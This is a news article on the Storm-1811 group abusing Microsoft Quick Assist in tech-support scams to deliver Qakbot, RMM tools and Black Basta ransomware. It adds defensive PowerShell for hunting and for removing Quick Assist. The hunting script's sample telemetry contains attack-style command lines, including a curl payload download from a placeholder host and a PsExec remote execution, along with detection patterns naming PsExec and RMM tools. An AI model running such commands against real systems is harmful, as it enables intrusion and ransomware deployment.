Microsoft has warned that hackers are using its Quick Assist remote assistance tool to initiate ransomware attacks.
A ransomware operator has been observed using Microsoft’s Quick Assist tool to dupe victims and deploy ransomware.
Storm-1811 – Microsoft’s own nomenclature – appears to be an associate of the Black Basta ransomware gang and is using Quick Assist as part of its initial attack vector.
Quick Assist is a remote assistance tool rather than a client management suite: a user can share their Windows or macOS device with another person over a remote connection, typically so that someone providing tech support can view the screen and, with the user's approval, take control of the device to fix a problem.
Storm-1811 uses the tool in a couple of different social engineering scenarios. In one, the threat actor cold calls a victim and pretends to be a legitimate tech support operator performing a “generic fix” on the device. In the other, the actor first manufactures the problem it then offers to solve. This is typically a spam issue: the actor signs the victim's email address up to a large number of subscriptions so that the inbox is flooded.
They then use this email-bombing attack to convince the victim they’re aware of the issue and can help stop the spam.
Regardless of how the hackers make contact, once they convince the victim they are genuine, they walk the victim through opening Quick Assist and entering the security code the attacker supplies, which shares the victim's screen with them. The hackers then use Quick Assist's ‘Request control’ feature to take over the device. If the victim approves the request, the threat actor downloads and runs their malicious payload, delivered as batch or ZIP files.
“Some of the batch scripts observed reference installing fake spam filter updates requiring the targets to provide sign-in credentials,” Microsoft’s Threat Intelligence team said in a blog post.
“In several cases, Microsoft Threat Intelligence identified such activity leading to the download of Qakbot, RMM tools like ScreenConnect and NetSupport Manager, and Cobalt Strike.”
With these tools in place, the threat actor can move laterally within the now-compromised network and maintain persistence.
“After the threat actor instals the initial tooling and the phone call is concluded, Storm-1811 leverages their access and performs further hands-on-keyboard activities such as domain enumeration and lateral movement,” Microsoft said.
“Storm-1811 then uses PsExec to deploy Black Basta ransomware throughout the network.”
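The chain described above (Quick Assist session, scripted download of a batch or ZIP payload, then RMM tooling and PsExec) is something a defender can correlate in process-creation telemetry. The following is an added example, not code from the article or from Microsoft. The record layout, process names and regexes are assumptions; map the columns to your own Sysmon Event ID 1 or Security Event ID 4688 export and extend the tooling list with the RMM products you actually see.

```powershell
# Added example (not code from the article or from Microsoft): a hunt over process-creation
# records for the Storm-1811 chain. A Quick Assist session on a host, followed within a time
# window by a scripted download of a batch or ZIP file and then by RMM or PsExec activity,
# is flagged. Process names, regexes and the record layout are assumptions.

# Constructed sample telemetry (UTC). Note that the download and the batch file are children
# of explorer.exe and cmd.exe, not of QuickAssist.exe: a remote-control session drives the
# user's own desktop, so a parent/child rule keyed on QuickAssist.exe would miss it. The
# correlation below is therefore per host and per time window. WS02 is a benign session.
$sampleCsv = @'
Time,Host,ParentImage,Image,CommandLine
2024-05-10T09:01:12Z,WS01,explorer.exe,QuickAssist.exe,QuickAssist.exe
2024-05-10T09:06:40Z,WS01,explorer.exe,cmd.exe,cmd.exe /c curl.exe -o C:\Users\Public\filter.zip http://example.invalid/f.zip
2024-05-10T09:07:05Z,WS01,cmd.exe,cmd.exe,cmd.exe /c C:\Users\Public\update.bat
2024-05-10T09:15:22Z,WS01,cmd.exe,ScreenConnect.ClientService.exe,ScreenConnect.ClientService.exe
2024-05-10T11:42:03Z,WS01,cmd.exe,PsExec.exe,PsExec.exe \\FS01 -s -d cmd /c C:\Temp\run.bat
2024-05-10T10:20:00Z,WS02,explorer.exe,QuickAssist.exe,QuickAssist.exe
2024-05-10T10:45:00Z,WS02,explorer.exe,OUTLOOK.EXE,OUTLOOK.EXE
'@

$events = $sampleCsv | ConvertFrom-Csv | Select-Object `
    @{ Name = 'Time'; Expression = { [datetimeoffset]::Parse($_.Time).UtcDateTime } },
    Host, ParentImage, Image, CommandLine

# Stage patterns, matched against "Image CommandLine". Assumed names; extend with your own
# RMM inventory (client32 is the NetSupport Manager client executable).
$stages = @{
    QuickAssist = '(?i)\bQuickAssist\.exe\b'
    Download    = '(?i)(\bcurl(\.exe)?\b.*\.(zip|bat)\b)|(\bcmd(\.exe)?\s+/c\s+\S+\.bat\b)'
    Tooling     = '(?i)\b(ScreenConnect|NetSupport|client32|PsExec(64)?)\b'
}

function Find-QuickAssistChains {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $WindowMinutes = 180   # hands-on-keyboard follow-up can be hours later; tune it
    )
    foreach ($group in ($Events | Sort-Object Time | Group-Object Host)) {
        $rows = $group.Group
        $sessions = $rows | Where-Object { "$($_.Image) $($_.CommandLine)" -match $stages.QuickAssist }
        foreach ($session in $sessions) {
            $deadline = $session.Time.AddMinutes($WindowMinutes)
            $window   = $rows | Where-Object { $_.Time -gt $session.Time -and $_.Time -le $deadline }
            $download = $window | Where-Object { "$($_.Image) $($_.CommandLine)" -match $stages.Download } |
                        Select-Object -First 1
            $tooling  = @($window | Where-Object { "$($_.Image) $($_.CommandLine)" -match $stages.Tooling })
            # Both a staged payload and follow-on tooling are required; a Quick Assist session
            # on its own (WS02) is normal help-desk activity and must not page anyone.
            if (-not $download -or $tooling.Count -eq 0) { continue }
            $severity = 'Medium: RMM staged after Quick Assist session'
            if ($tooling.Image -match '(?i)psexec') { $severity = 'High: PsExec deployment stage reached' }
            [pscustomobject]@{
                Host        = $group.Name
                SessionTime = $session.Time
                Download    = $download.CommandLine
                Tooling     = ($tooling.Image | Sort-Object -Unique) -join ', '
                Severity    = $severity
            }
        }
    }
}

# On the constructed data this reports one chain on WS01 at High severity and nothing for WS02.
Find-QuickAssistChains -Events $events | Format-List
```

The point of the per-host time window rather than a parent/child relationship is the caveat in the comments: the attacker is typing into the victim's existing desktop, so the payloads descend from explorer.exe and cmd.exe, and a rule that expects QuickAssist.exe as the parent will never fire.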
According to Microsoft, the use of Quick Assist to ultimately deploy tools like Qakbot shows the need to focus on the early stages of a ransomware attack, not just the eventual deployment of the ransomware itself. Microsoft recommends educating users about tech support scams and blocking or uninstalling Quick Assist, along with other remote monitoring and management tools, in environments where they are not in use.
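For the uninstall recommendation, the following is an added example, not code from the article or from Microsoft, for inventorying and removing Quick Assist on a Windows host where it is not in use. It assumes the two install paths I know of: the Microsoft Store package `MicrosoftCorporationII.QuickAssist` and, on older Windows 10 builds, the optional capability `App.Support.QuickAssist~~~~0.0.1.0`. Verify both names on your build with `Get-AppxPackage` and `Get-WindowsCapability` before relying on them.

```powershell
#Requires -RunAsAdministrator
# Added example (not code from the article or from Microsoft): inventory and remove Quick
# Assist where it is not in use. Package and capability names are assumptions; confirm them
# on your build. Run elevated. Remove-QuickAssist supports -WhatIf for a dry run.

$pkgName = 'MicrosoftCorporationII.QuickAssist'      # Store app (current builds)
$capName = 'App.Support.QuickAssist~~~~0.0.1.0'       # legacy optional capability

function Get-QuickAssistInstallState {
    # Store app installed for any user profile on this machine
    $installed = Get-AppxPackage -AllUsers -Name $pkgName
    # Provisioned package: would be installed again for every new user profile
    $provisioned = Get-AppxProvisionedPackage -Online | Where-Object DisplayName -eq $pkgName
    # Legacy capability, present on older builds only
    $capability = Get-WindowsCapability -Online -Name $capName -ErrorAction SilentlyContinue
    $capState = 'NotPresent'
    if ($capability) { $capState = $capability.State }
    [pscustomobject]@{
        StoreAppInstalled      = [bool]$installed
        StoreAppPackages       = @($installed.PackageFullName)
        ProvisionedForNewUsers = [bool]$provisioned
        LegacyCapability       = $capState
    }
}

function Remove-QuickAssist {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    # 1. Remove the Store app from every user profile
    Get-AppxPackage -AllUsers -Name $pkgName | ForEach-Object {
        if ($PSCmdlet.ShouldProcess($_.PackageFullName, 'Remove-AppxPackage -AllUsers')) {
            Remove-AppxPackage -Package $_.PackageFullName -AllUsers
        }
    }
    # 2. Deprovision it so new profiles do not get it back
    Get-AppxProvisionedPackage -Online | Where-Object DisplayName -eq $pkgName | ForEach-Object {
        if ($PSCmdlet.ShouldProcess($_.PackageName, 'Remove-AppxProvisionedPackage -Online')) {
            Remove-AppxProvisionedPackage -Online -PackageName $_.PackageName | Out-Null
        }
    }
    # 3. Remove the legacy capability if this build still carries it
    $cap = Get-WindowsCapability -Online -Name $capName -ErrorAction SilentlyContinue
    if ($cap -and $cap.State -eq 'Installed' -and
        $PSCmdlet.ShouldProcess($capName, 'Remove-WindowsCapability -Online')) {
        Remove-WindowsCapability -Online -Name $capName | Out-Null
    }
}

Get-QuickAssistInstallState
Remove-QuickAssist -WhatIf     # preview; drop -WhatIf to actually remove
Get-QuickAssistInstallState
```

Removal alone does not stop a user from reinstalling the app from the Microsoft Store when a caller tells them to, which is exactly the social engineering this article describes. Pair the uninstall with a Store or AppLocker policy that blocks the package, and treat the same question (is it in use, and who is allowed to run it) as applying to the other remote management tools Microsoft names.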
David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.